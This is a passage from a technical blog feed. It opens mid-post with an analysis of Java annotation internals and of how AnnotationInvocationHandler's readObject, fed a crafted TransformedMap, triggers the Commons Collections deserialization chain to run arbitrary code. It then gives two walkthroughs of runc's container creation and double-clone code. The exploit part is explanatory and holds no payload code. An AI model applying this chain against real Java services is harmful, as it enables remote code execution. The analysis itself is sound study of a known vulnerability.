<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Person.class.getAnnotation(AnnType.class);
</code></pre></div></div>
<p>to study how annotations are implemented.</p>
<p>The Class object has an annotations member that stores the type’s annotation information. annotations is a Map whose keys are annotation Classes and whose values are dynamic proxies implementing Annotation. getAnnotation is implemented as follows. initAnnotationsIfNecessary initializes annotations and only performs real work on the first call; once annotations is populated, the Map is simply queried with annotationClass.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Map<Class<? extends Annotation>, Annotation> annotations;
public <A extends Annotation> A getAnnotation(Class<A> annotationClass) {
if (annotationClass == null)
throw new NullPointerException();
initAnnotationsIfNecessary();
return (A) annotations.get(annotationClass);
}
</code></pre></div></div>
<p>initAnnotationsIfNecessary is implemented as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private synchronized void initAnnotationsIfNecessary() {
clearAnnotationCachesOnClassRedefinition();
if (annotations != null)
return;
declaredAnnotations = AnnotationParser.parseAnnotations(
getRawAnnotations(), getConstantPool(), this);
Class<?> superClass = getSuperclass();
if (superClass == null) {
annotations = declaredAnnotations;
} else {
annotations = new HashMap<>();
superClass.initAnnotationsIfNecessary();
for (Map.Entry<Class<? extends Annotation>, Annotation> e : superClass.annotations.entrySet()) {
Class<? extends Annotation> annotationClass = e.getKey();
if (AnnotationType.getInstance(annotationClass).isInherited())
annotations.put(annotationClass, e.getValue());
}
annotations.putAll(declaredAnnotations);
}
}
</code></pre></div></div>
<p>From the code above we can see that the Class type actually has another member, declaredAnnotations, which stores the annotations declared on the class itself. If there is no superclass, annotations and declaredAnnotations hold the same data; if there is one, initAnnotationsIfNecessary also copies the superclass’s inheritable annotations into annotations. The key call is the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> declaredAnnotations = AnnotationParser.parseAnnotations(
getRawAnnotations(), getConstantPool(), this);
</code></pre></div></div>
<p>Following the calls through parseAnnotations->parseAnnotations2->parseAnnotation2, the last function does the actual annotation parsing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private static Annotation parseAnnotation2(ByteBuffer var0, ConstantPool var1, Class<?> var2, boolean var3, Class<? extends Annotation>[] var4) {
int var5 = var0.getShort() & '\uffff';
Class var6 = null;
String var7 = "[unknown]";
try {
try {
var7 = var1.getUTF8At(var5);//var7 is the type name, e.g. Ltest/com/company/AnnType;
var6 = parseSig(var7, var2);//var6 is interface test.com.company.AnnType
} catch (IllegalArgumentException var18) {
var6 = var1.getClassAt(var5);
}
}...
if (var4 != null && !contains(var4, var6)) {
skipAnnotation(var0, false);
return null;
} else {
AnnotationType var8 = null;
try {
var8 = AnnotationType.getInstance(var6);//var8 is the AnnotationType
} catch (IllegalArgumentException var17) {
skipAnnotation(var0, false);
return null;
}
Map var9 = var8.memberTypes();
LinkedHashMap var10 = new LinkedHashMap(var8.memberDefaults());
int var11 = var0.getShort() & '\uffff';
for(int var12 = 0; var12 < var11; ++var12) {
int var13 = var0.getShort() & '\uffff';
String var14 = var1.getUTF8At(var13);
Class var15 = (Class)var9.get(var14);
if (var15 == null) {
skipMemberValue(var0);
} else {
Object var16 = parseMemberValue(var15, var0, var1, var2);
if (var16 instanceof AnnotationTypeMismatchExceptionProxy) {
((AnnotationTypeMismatchExceptionProxy)var16).setMember((Method)var8.members().get(var14));
}
var10.put(var14, var16);
}
}
return annotationForMap(var6, var10);
}
}
</code></pre></div></div>
<p>As mentioned earlier, an annotation is an interface extending Annotation. A new class appears here: AnnotationType, which stores an annotation’s metadata. Briefly, its three most important members are the following three Maps.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private final Map<String, Class<?>> memberTypes;
private final Map<String, Object> memberDefaults;
private final Map<String, Method> members;
</code></pre></div></div>
<p>The first, memberTypes, maps member names to their Classes; the second, memberDefaults, maps names to default values; the third, members, maps names to Methods. Taking the AnnType annotation from our example, the members look like this:</p>
<p><img src="/assets/img/java1/5.png" alt="" /></p>
<p>An AnnotationType is created through AnnotationType.getInstance, which parseAnnotation2 calls. The for loop at the end of parseAnnotation2 replaces the annotation’s default values with the actual ones; for example, AnnType’s default is type, but in Person it is set to xaa.</p>
<p>At its end, parseAnnotation2 reaches annotationForMap.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public static Annotation annotationForMap(Class<? extends Annotation> var0, Map<String, Object> var1) {
return (Annotation)Proxy.newProxyInstance(var0.getClassLoader(), new Class[]{var0}, new AnnotationInvocationHandler(var0, var1));
}
</code></pre></div></div>
<p>annotationForMap creates the dynamic proxy. The var0 parameter is the Class object of AnnType, and var1 is a LinkedHashMap holding each annotation member name and its value, e.g. “msg”->“xaa” for the Person class. The handler is AnnotationInvocationHandler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
Class[] var3 = var1.getInterfaces();
if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
this.type = var1;
this.memberValues = var2;
} else {
throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
}
}
</code></pre></div></div>
<p>The constructor saves the annotation’s type information and the key-value pairs into this.type and this.memberValues.</p>
<p>When annMethod.msg() is called in the test example, the proxy class’s invoke runs, which delegates to the handler’s invoke. AnnotationInvocationHandler’s invoke is shown below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> public Object invoke(Object var1, Method var2, Object[] var3) {
String var4 = var2.getName();
Class[] var5 = var2.getParameterTypes();
if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
return this.equalsImpl(var3[0]);
} else if (var5.length != 0) {
throw new AssertionError("Too many parameters for an annotation method");
} else {
byte var7 = -1;
switch(var4.hashCode()) {
case -1776922004:
if (var4.equals("toString")) {
var7 = 0;
}
break;
case 147696667:
if (var4.equals("hashCode")) {
var7 = 1;
}
break;
case 1444986633:
if (var4.equals("annotationType")) {
var7 = 2;
}
}
switch(var7) {
case 0:
return this.toStringImpl();
case 1:
return this.hashCodeImpl();
case 2:
return this.type;
default:
Object var6 = this.memberValues.get(var4);
if (var6 == null) {
throw new IncompleteAnnotationException(this.type, var4);
} else if (var6 instanceof ExceptionProxy) {
throw ((ExceptionProxy)var6).generateException();
} else {
if (var6.getClass().isArray() && Array.getLength(var6) != 0) {
var6 = this.cloneArray(var6);
}
return var6;
}
}
}
}
</code></pre></div></div>
<p>As we can see, for a call that is not one of the built-in methods, invoke obtains the method name via var4, looks it up in the this.memberValues Map, and returns the resulting value.</p>
<h3> PoC analysis </h3>
<p>In the PoC, what is essentially written to the file is an instance of AnnotationInvocationHandler whose constructor arguments are Retention.class and a TransformedMap. Thought of in the forward direction, this builds an AnnotationInvocationHandler that handles the Retention annotation and whose backing Map is a TransformedMap. Of course the state of the TransformedMap, such as its transformers, is serialized into the file as well.</p>
<p>During deserialization, AnnotationInvocationHandler’s own readObject is invoked.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
var1.defaultReadObject();
AnnotationType var2 = null;
try {
var2 = AnnotationType.getInstance(this.type);
} catch (IllegalArgumentException var9) {
throw new InvalidObjectException("Non-annotation type in annotation serial stream");
}
Map var3 = var2.memberTypes();
Iterator var4 = this.memberValues.entrySet().iterator();
while(var4.hasNext()) {
Entry var5 = (Entry)var4.next();
String var6 = (String)var5.getKey();
Class var7 = (Class)var3.get(var6);
if (var7 != null) {
Object var8 = var5.getValue();
if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
}
}
}
}
</code></pre></div></div>
<p>var1.defaultReadObject first performs the default deserialization, which restores the AnnotationInvocationHandler’s fields.</p>
<p><img src="/assets/img/java1/6.png" alt="" /></p>
<p>Next it obtains the AnnotationType of the Retention annotation.</p>
<p><img src="/assets/img/java1/7.png" alt="" /></p>
<p>Retention is a meta-annotation, so the AnnotationType here is derived from the following definition.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @Documented
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.ANNOTATION_TYPE)
public @interface Retention {
RetentionPolicy value();
}
</code></pre></div></div>
<p>Now the Map var3 holds the genuine member type information of the Retention annotation: the key is “value” and the value is RetentionPolicy, a dedicated class.
readObject then loops over the deserialized this.memberValues Map, essentially checking whether each deserialized value’s type matches the generated AnnotationType’s memberTypes.
Since the Map we put into the AnnotationInvocationHandler at serialization time contains “value”=”test”, whose value is a String, while the AnnotationType says a RetentionPolicy is required here, var5.setValue is eventually called, which ends up in TransformedMap’s checkSetValue and thus in the transform function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> protected Object checkSetValue(Object value) {
return this.valueTransformer.transform(value);
}
</code></pre></div></div>
<p>In summary, AnnotationInvocationHandler’s readObject essentially performs a validation; when a value fails the type check, readObject calls the Map entry’s setter, which triggers the Transformer’s transform function and thereby executes arbitrary code.</p>
<h3> Summary </h3>
<p>This post used a Commons Collections PoC to walk through the concepts that are hard for beginners, mainly dynamic proxies and the annotation implementation. With this analysis you should be able to understand the AnnotationInvocationHandler-based Commons Collections exploit chain. As the analysis shows, exploiting Commons Collections is fairly involved and not very beginner-friendly; the Fastjson deserialization exploit is actually much simpler.</p>
runc internals, part 3: runc double clone2021-12-28T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/28/runc-internals-3
<p>Now that we have analyzed the general process of ‘runc create’, we know that ‘runc create’ executes the ‘runc init’ parent process; the parent process clones a child, the child clones a grandchild, and the grandchild executes the user-defined process.</p>
<p>At first I intended to draw a picture of the relationship between these four processes, but I found a detailed one <a href="https://mp.weixin.qq.com/s/mSlc2RMRDe6liXb-ejtRvA">here</a>, so I simply reference it.</p>
<p><img src="/assets/img/runcinternals3/1.png" alt="" /></p>
<p>So let’s look at what each of these processes does.</p>
<h3> parent </h3>
<p>This is runc:[0:PARENT].</p>
<ul>
<li>
<p>Get the config from the ‘runc create’ process. This is done by</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> nl_parse(pipenum, &config); //corresponding runc create code :io.Copy(p.messageSockPair.parent, p.bootstrapData)
</code></pre></div> </div>
</li>
<li>Create two socketpairs, ‘sync_child_pipe’ and ‘sync_grandchild_pipe’, to synchronize with the child and grandchild.</li>
<li>Clone child process</li>
<li>Update the uid/gid mapping for child process</li>
<li>Receive the pids of the child and grandchild, and send both to the ‘runc create’ process so that ‘runc create’ can send config data to the grandchild.</li>
<li>Wait for the grandchild to run</li>
</ul>
<h3> child </h3>
<p>This is runc:[1:CHILD].</p>
<ul>
<li>Join the namespaces specified in config.json</li>
<li>Ask the parent process to set up the uid/gid mapping</li>
<li>Unshare the namespaces specified in config.json</li>
<li>Clone grandchild process</li>
<li>Send the pid of grandchild to parent</li>
</ul>
<h3> grandchild </h3>
<p>This is runc:[2:INIT].</p>
<ul>
<li>Now this process is in the new pid namespace.</li>
<li>Notify the parent process we are ready</li>
<li>factory.StartInitialization()</li>
<li>Configure the environment specified in config.json and execute the user process</li>
</ul>
<h3> summary </h3>
<p>The first clone lets the parent set the uid/gid mapping. The second clone makes the pid namespace take effect. After this double clone, the child process is fully inside the desired new environment.</p>
<h3> reference </h3>
<p><a href="https://mp.weixin.qq.com/s/mSlc2RMRDe6liXb-ejtRvA">runc源码分析</a>
<a href="https://zdyxry.github.io/2020/04/12/runc-nsenter-%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB/">runc nsenter 源码阅读</a></p>
runc internals, part 2: create and run a container2021-12-23T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/23/runc-internals-2
<h3> runc create analysis </h3>
<p>We can create a container by running ‘runc create’. To keep the tty/console out of the picture, let’s change the default ‘config.json’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "terminal": false,
...
"args": [
"sleep",
"1000"
],
</code></pre></div></div>
<p>I list the important function calls below.</p>
<p>startContainer
–>setupSpec
–>createContainer
–>specconv.CreateLibcontainerConfig
–>loadFactory
–>factory.Create
–>manager.New</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--runner.run
-->newProcess
-->setupIO
-->r.container.Start
-->c.createExecFifo
-->c.start
-->c.newParentProcess
-->c.commandTemplate
-->c.newInitProcess
-->parent.start
-->p.cmd.Start
-->p.sendConfig
</code></pre></div></div>
<p>The create process in general consists of three steps, which I have separated with empty lines.</p>
<p>The first is the preparation work; the code is mostly in ‘utils_linux.go’. It contains the following:</p>
<ul>
<li>load spec from config.json</li>
<li>create a container object using the factory pattern</li>
<li>create a runner and call the runner.run</li>
</ul>
<p>The second is the runner.run process; the code is mostly in ‘container_linux.go’. It contains the following:</p>
<ul>
<li>Call container.Start, which takes us into the libcontainer layer</li>
<li>Call the internal function c.start, which creates a newParentProcess</li>
<li>Call parent.start</li>
</ul>
<p>The third is parent.start(); the code is in ‘init.go’ and ‘nsenter.c’. It contains the following:</p>
<ul>
<li>p.cmd.Start creates a child process, which is ‘runc init’.</li>
<li>The runc init process does a double clone and finally runs the process defined in config.json. This is an interesting process which I will analyze in a separate post.</li>
</ul>
<p>Ok, let’s dig into the code.</p>
<h3> prepare </h3>
<p>The following picture shows the preparation work.</p>
<p><img src="/assets/img/runcinternals2/1.png" alt="" /></p>
<p>‘startContainer’ calls setupSpec to get the spec from config.json. Then it calls ‘createContainer’ to create a new container object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
if err := revisePidFile(context); err != nil {
return -1, err
}
spec, err := setupSpec(context)
...
container, err := createContainer(context, id, spec)
...
}
</code></pre></div></div>
<p>Linux has no built-in container concept. libcontainer uses a ‘linuxContainer’ struct to represent a container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> type linuxContainer struct {
id string
root string
config *configs.Config
cgroupManager cgroups.Manager
intelRdtManager intelrdt.Manager
initPath string
initArgs []string
initProcess parentProcess
initProcessStartTime uint64
criuPath string
newuidmapPath string
newgidmapPath string
m sync.Mutex
criuVersion int
state containerState
created time.Time
fifo *os.File
}
</code></pre></div></div>
<p>As we can see, there are several container-related fields. ‘initPath’ specifies the init program for spawning a container; ‘initProcess’ is the process representation of that init program.</p>
<p>A linuxContainer is created by a ‘LinuxFactory’. createContainer is easy to understand: it first creates a libcontainer config, then creates a LinuxFactory (by calling loadFactory) and finally creates a linuxContainer (by calling factory.Create).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func createContainer(context *cli.Context, id string, spec *specs.Spec) (libcontainer.Container, error) {
rootlessCg, err := shouldUseRootlessCgroupManager(context)
if err != nil {
return nil, err
}
config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
CgroupName: id,
UseSystemdCgroup: context.GlobalBool("systemd-cgroup"),
NoPivotRoot: context.Bool("no-pivot"),
NoNewKeyring: context.Bool("no-new-keyring"),
Spec: spec,
RootlessEUID: os.Geteuid() != 0,
RootlessCgroups: rootlessCg,
})
if err != nil {
return nil, err
}
factory, err := loadFactory(context)
if err != nil {
return nil, err
}
return factory.Create(id, config)
}
</code></pre></div></div>
<p>‘loadFactory’ calls ‘libcontainer.New’ to create a new factory. As we can see, ‘InitPath’ is set to the runc program itself and ‘InitArgs’ is set to ‘init’. This means ‘runc init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
...
l := &LinuxFactory{
Root: root,
InitPath: "/proc/self/exe",
InitArgs: []string{os.Args[0], "init"},
Validator: validate.New(),
CriuPath: "criu",
}
...
}
</code></pre></div></div>
<p>After creating the factory, ‘createContainer’ calls ‘factory.Create’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (l *LinuxFactory) Create(id string, config *configs.Config) (Container, error) {
...
cm, err := manager.New(config.Cgroups)
...
if err := os.MkdirAll(containerRoot, 0o711); err != nil {
return nil, err
}
if err := os.Chown(containerRoot, unix.Geteuid(), unix.Getegid()); err != nil {
return nil, err
}
c := &linuxContainer{
id: id,
root: containerRoot,
config: config,
initPath: l.InitPath,
initArgs: l.InitArgs,
criuPath: l.CriuPath,
newuidmapPath: l.NewuidmapPath,
newgidmapPath: l.NewgidmapPath,
cgroupManager: cm,
}
...
c.state = &stoppedState{c: c}
return c, nil
}
</code></pre></div></div>
<p>Notice that ‘initPath’ and ‘initArgs’ of the linuxContainer are assigned from the LinuxFactory. ‘factory.Create’ also creates a directory that serves as the container root. After creating the container, ‘startContainer’ creates a ‘runner’ and calls ‘r.run’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
...
r := &runner{
enableSubreaper: !context.Bool("no-subreaper"),
shouldDestroy: !context.Bool("keep"),
container: container,
listenFDs: listenFDs,
notifySocket: notifySocket,
consoleSocket: context.String("console-socket"),
detach: context.Bool("detach"),
pidFile: context.String("pid-file"),
preserveFDs: context.Int("preserve-fds"),
action: action,
criuOpts: criuOpts,
init: true,
}
return r.run(spec.Process)
}
</code></pre></div></div>
<p>The runner object is, as its name indicates, a runner: it lets the user run a process in a container. The ‘runner’ holds the ‘container’ plus some other control options. The ‘action’ can be ‘CT_ACT_CREATE’, meaning just create, or ‘CT_ACT_RUN’, meaning create and run. ‘init’ decides whether we should do the initialization work; it is false when we exec a new process in an existing container.
The parameter of ‘r.run’ is ‘spec.Process’, the process from config.json that we need to execute.</p>
<p>Let’s go to ‘r.run’. ‘newProcess’ creates a new ‘libcontainer.Process’ object and ‘setupIO’ initializes the process’s IO.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (r *runner) run(config *specs.Process) (int, error) {
var err error
...
process, err := newProcess(*config)
...
// Populate the fields that come from runner.
process.Init = r.init
...
tty, err := setupIO(process, rootuid, rootgid, config.Terminal, detach, r.consoleSocket)
if err != nil {
return -1, err
}
defer tty.Close()
switch r.action {
case CT_ACT_CREATE:
err = r.container.Start(process)
case CT_ACT_RESTORE:
err = r.container.Restore(process, r.criuOpts)
case CT_ACT_RUN:
err = r.container.Run(process)
default:
panic("Unknown action")
}
...
return status, err
}
</code></pre></div></div>
<p>Finally, the function corresponding to ‘r.action’ is called; in the create case this is ‘r.container.Start’.</p>
<h3> container start </h3>
<p>The following picture shows the container start process.</p>
<p><img src="/assets/img/runcinternals2/2.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) Start(process *Process) error {
c.m.Lock()
defer c.m.Unlock()
if c.config.Cgroups.Resources.SkipDevices {
return errors.New("can't start container with SkipDevices set")
}
if process.Init {
if err := c.createExecFifo(); err != nil {
return err
}
}
if err := c.start(process); err != nil {
if process.Init {
c.deleteExecFifo()
}
return err
}
return nil
}
</code></pre></div></div>
<p>‘c.createExecFifo’ creates a fifo in the container directory; the default path is ‘/run/runc/<container id>/exec.fifo’.
Then we reach the internal start function. Most of the work of ‘start’ is creating a new parentProcess. A parentProcess is, as its name indicates, a process that launches the child process, i.e. the process defined in config.json. Why do we need a parentProcess? Because we can’t put a process into a container environment (separate namespaces, cgroup control and so on) in one step; it takes several steps. ‘parentProcess’ is an interface in runc with two implementations, ‘setnsProcess’ and ‘initProcess’, used for the ‘runc exec’ and ‘runc create/run’ cases respectively.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) start(process *Process) (retErr error) {
parent, err := c.newParentProcess(process)
...
if err := parent.start(); err != nil {
return fmt.Errorf("unable to start container process: %w", err)
}
...
}
</code></pre></div></div>
<p>The ‘initProcess’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> type initProcess struct {
cmd *exec.Cmd
messageSockPair filePair
logFilePair filePair
config *initConfig
manager cgroups.Manager
intelRdtManager intelrdt.Manager
container *linuxContainer
fds []string
process *Process
bootstrapData io.Reader
sharePidns bool
}
</code></pre></div></div>
<p>‘cmd’ holds the parent process’s program and args, ‘process’ is the process info defined in config.json, and ‘bootstrapData’ contains the data the parent sends to the child process.
Let’s see how the parentProcess is created.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
if err != nil {
return nil, fmt.Errorf("unable to create init pipe: %w", err)
}
messageSockPair := filePair{parentInitPipe, childInitPipe}
parentLogPipe, childLogPipe, err := os.Pipe()
if err != nil {
return nil, fmt.Errorf("unable to create log pipe: %w", err)
}
logFilePair := filePair{parentLogPipe, childLogPipe}
cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
...
return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
}
</code></pre></div></div>
<p>‘c.commandTemplate’ prepares the parentProcess’s command line. As we can see, the command is set to ‘c.initPath’ and ‘c.initArgs’, i.e. ‘runc init’. It also adds some environment variables to the cmd; two fds, one for the init pipe and one for the log pipe, are passed to the child this way.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) commandTemplate(p *Process, childInitPipe *os.File, childLogPipe *os.File) *exec.Cmd {
cmd := exec.Command(c.initPath, c.initArgs[1:]...)
cmd.Args[0] = c.initArgs[0]
cmd.Stdin = p.Stdin
cmd.Stdout = p.Stdout
cmd.Stderr = p.Stderr
cmd.Dir = c.config.Rootfs
if cmd.SysProcAttr == nil {
cmd.SysProcAttr = &unix.SysProcAttr{}
}
cmd.Env = append(cmd.Env, "GOMAXPROCS="+os.Getenv("GOMAXPROCS"))
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ExtraFiles...)
if p.ConsoleSocket != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ConsoleSocket)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_CONSOLE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
)
}
cmd.ExtraFiles = append(cmd.ExtraFiles, childInitPipe)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_INITPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
"_LIBCONTAINER_STATEDIR="+c.root,
)
cmd.ExtraFiles = append(cmd.ExtraFiles, childLogPipe)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_LOGPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
"_LIBCONTAINER_LOGLEVEL="+p.LogLevel,
)
// NOTE: when running a container with no PID namespace and the parent process spawning the container is
// PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
// even with the parent still running.
if c.config.ParentDeathSignal > 0 {
cmd.SysProcAttr.Pdeathsig = unix.Signal(c.config.ParentDeathSignal)
}
return cmd
}
</code></pre></div></div>
<p>After preparing the cmd, ‘newParentProcess’ calls ‘newInitProcess’ to create an ‘initProcess’ object. ‘newInitProcess’ also builds the bootstrap data, which contains the clone flags from config.json and the ns maps; together these define which namespaces the process from config.json will run in.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) newInitProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*initProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initStandard))
nsMaps := make(map[configs.NamespaceType]string)
for _, ns := range c.config.Namespaces {
if ns.Path != "" {
nsMaps[ns.Type] = ns.Path
}
}
_, sharePidns := nsMaps[configs.NEWPID]
data, err := c.bootstrapData(c.config.Namespaces.CloneFlags(), nsMaps, initStandard)
...
init := &initProcess{
cmd: cmd,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
manager: c.cgroupManager,
intelRdtManager: c.intelRdtManager,
config: c.newInitConfig(p),
container: c,
process: p,
bootstrapData: data,
sharePidns: sharePidns,
}
c.initProcess = init
return init, nil
}
</code></pre></div></div>
<p>‘CloneFlags’ returns the clone flags parsed from config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (n *Namespaces) CloneFlags() uintptr {
var flag int
for _, v := range *n {
if v.Path != "" {
continue
}
flag |= namespaceInfo[v.Type]
}
return uintptr(flag)
}
</code></pre></div></div>
<p>By default the following new namespaces are created:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "namespaces": [
{
"type": "pid"
},
{
"type": "network"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
}
],
</code></pre></div></div>
<p>After the ‘parentProcess’ is created, ‘parent.start()’ is called in the linuxContainer.start function to start the parent process, which it does by calling ‘p.cmd.Start()’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (p *initProcess) start() (retErr error) {
defer p.messageSockPair.parent.Close() //nolint: errcheck
err := p.cmd.Start()
...
}
</code></pre></div></div>
<h3> parent start </h3>
<p>The following picture gives a brief description of this phase.</p>
<p><img src="/assets/img/runcinternals2/3.png" alt="" /></p>
<p>‘p.cmd.Start()’ starts a new process, ‘runc init’. The handler for ‘init’ is in the ‘init.go’ file. Go is a high-level language, but the namespace operations are very low level and must run before the multi-threaded Go runtime starts, so they cannot be done in Go code. That is why init.go imports the nsenter package.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> _ "github.com/opencontainers/runc/libcontainer/nsenter"
</code></pre></div></div>
<p>nsenter pkg contains cgo code as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package nsenter
/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
nsexec();
}
*/
import "C"
</code></pre></div></div>
<p>So nsexec is executed first; the code is in ‘libcontainer/nsenter/nsexec.c’.
‘nsexec’ is a long function that I will discuss in another post. Here is just a summary of this parent process.
The ‘runc init’ parent process (runc:[0:PARENT]) clones a new process named ‘runc:[1:CHILD]’. runc:[1:CHILD] sets up the namespaces, but since a new pid namespace only takes effect in child processes, ‘runc:[1:CHILD]’ clones yet another process named ‘runc:[2:INIT]’. The original ‘runc create’ process does some synchronization work with these processes.</p>
<p>Now ‘runc:[2:INIT]’ is entirely inside the new namespaces, and ‘init.go’ calls factory.StartInitialization to do the final initialization work and exec the process defined in config.json. ‘factory.StartInitialization’ creates a new ‘initer’ object. ‘initer’ is an interface, and not surprisingly there are two implementations: one for ‘runc exec’ (linuxSetnsInit) and one for ‘runc create/run’ (linuxStandardInit). ‘StartInitialization’ finally calls ‘i.Init()’ to do the real initialization work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> // StartInitialization loads a container by opening the pipe fd from the parent to read the configuration and state
// This is a low level implementation detail of the reexec and should not be consumed externally
func (l *LinuxFactory) StartInitialization() (err error) {
...
i, err := newContainerInit(it, pipe, consoleSocket, fifofd, logPipeFd, mountFds)
if err != nil {
return err
}
// If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
return i.Init()
}
</code></pre></div></div>
<p>The main routine of Init() follows. Init mostly applies the configuration specified in config.json, for example setupNetwork, setupRoute, the hostname, the apparmor profile, sysctl, readonly paths, seccomp and so on.
Notice that near the end of this function it opens the exec fifo, ‘/run/runc/<container id>/exec.fifo’, for writing and writes to it. Since there is no reader on the other end yet, this open (and hence the write) blocks until ‘runc start’ opens the fifo for reading.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (l *linuxStandardInit) Init() error {
...
if err := setupNetwork(l.config); err != nil {
return err
}
if err := setupRoute(l.config.Config); err != nil {
return err
}
// initialises the labeling system
selinux.GetEnabled()
// We don't need the mountFds after prepareRootfs() nor if it fails.
err := prepareRootfs(l.pipe, l.config, l.mountFds)
...
if hostname := l.config.Config.Hostname; hostname != "" {
if err := unix.Sethostname([]byte(hostname)); err != nil {
return &os.SyscallError{Syscall: "sethostname", Err: err}
}
}
if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil {
return fmt.Errorf("unable to apply apparmor profile: %w", err)
}
for key, value := range l.config.Config.Sysctl {
if err := writeSystemProperty(key, value); err != nil {
return err
}
}
for _, path := range l.config.Config.ReadonlyPaths {
if err := readonlyPath(path); err != nil {
return fmt.Errorf("can't make %q read-only: %w", path, err)
}
}
for _, path := range l.config.Config.MaskPaths {
if err := maskPath(path, l.config.Config.MountLabel); err != nil {
return fmt.Errorf("can't mask path %s: %w", path, err)
}
}
pdeath, err := system.GetParentDeathSignal()
if err != nil {
return fmt.Errorf("can't get pdeath signal: %w", err)
}
if l.config.NoNewPrivileges {
...
if l.config.Config.Seccomp != nil && !l.config.NoNewPrivileges {
seccompFd, err := seccomp.InitSeccomp(l.config.Config.Seccomp)
if err != nil {
return err
}
if err := syncParentSeccomp(l.pipe, seccompFd); err != nil {
return err
}
}
if err := finalizeNamespace(l.config); err != nil {
return err
}
...
// Close the pipe to signal that we have completed our init.
logrus.Debugf("init: closing the pipe to signal completion")
_ = l.pipe.Close()
// Close the log pipe fd so the parent's ForwardLogs can exit.
if err := unix.Close(l.logFd); err != nil {
